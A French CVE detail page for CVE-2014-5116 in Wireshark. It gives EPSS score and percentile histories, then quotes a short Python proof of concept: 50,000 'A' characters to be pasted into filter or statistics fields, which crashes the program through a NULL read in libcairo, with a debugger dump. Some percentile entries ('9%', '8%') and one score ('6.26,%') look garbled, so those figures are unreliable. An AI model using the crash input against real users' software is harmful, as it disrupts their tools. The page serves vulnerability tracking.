CVE-2014-5116 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	7.58%	–	–
2022-03-20	–	–	7.58%	–	–
2022-04-03	–	–	7.58%	–	–
2022-07-17	–	–	7.58%	–	–
2023-01-15	–	–	7.03%	–	–
2023-03-12	–	–	–	3.62%	–
2023-09-17	–	–	–	3.62%	–
2023-10-15	–	–	–	3.44%	–
2023-12-17	–	–	–	3.44%	–
2024-02-11	–	–	–	1.04%	–
2024-03-03	–	–	–	1.04%	–
2024-03-17	–	–	–	0.81%	–
2024-04-14	–	–	–	0.99%	–
2024-06-02	–	–	–	1.2%	–
2024-06-09	–	–	–	0.6%	–
2024-06-16	–	–	–	0.6%	–
2024-07-28	–	–	–	0.65%	–
2024-09-22	–	–	–	4.38%	–
2024-11-03	–	–	–	3.14%	–
2024-12-22	–	–	–	2.28%	–
2025-02-16	–	–	–	2.4%	–
2025-01-19	–	–	–	2.28%	–
2025-02-16	–	–	–	2.4%	–
2025-03-18	–	–	–	–	6.26%
2025-03-18	–	–	–	–	6.26,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	81%
2022-03-20	82%
2022-04-03	92%
2022-07-17	93%
2023-01-15	92%
2023-03-12	9%
2023-09-17	91%
2023-10-15	9%
2023-12-17	91%
2024-02-11	83%
2024-03-03	84%
2024-03-17	81%
2024-04-14	83%
2024-06-02	85%
2024-06-09	78%
2024-06-16	79%
2024-07-28	8%
2024-09-22	93%
2024-11-03	91%
2024-12-22	89%
2025-02-16	9%
2025-01-19	89%
2025-02-16	9%
2025-03-18	9%
2025-03-18	9%

#!/usr/bin/python # Exploit Title: Wireshark Read Access Violation near NULL starting at libcairo_2!cairo_image_surface_get_data() # Date: May 15th 2014 # Author: Osanda Malith Jayathissa # E-Mail: osandajayathissa<[at]>gmail.com # Version: 1.10.7 32-bit and 64-bit # Vendor Homepage: http://www.wireshark.org # Tested on: Windows 8 64-bit ''' The issue is with the cairo_image_surface_get_data() function in Cairo. These fields are vulnerable: - Filter text box - Statistics -> IP DESTINATIONS - Statistics -> IP Addresses Paste the generated text in any one of above fields and hit return. ''' payload = "A" * 50000 file = open('exploit.txt', "w") file.write(payload) file.close() ''' *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Wireshark32\libcairo-2.dll - eax=00000000 ebx=052dabf0 ecx=77bc2ad2 edx=612fc6e0 esi=00000000 edi=612fc6e0 eip=61291737 esp=008cdca0 ebp=00000000 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206 libcairo_2!cairo_image_surface_get_data+0x7: 61291737 8138609d2f61 cmp dword ptr [eax],offset libcairo_2!cairo_tee_surface_index+0xd080 (612f9d60) ds:002b:00000000=???????? '''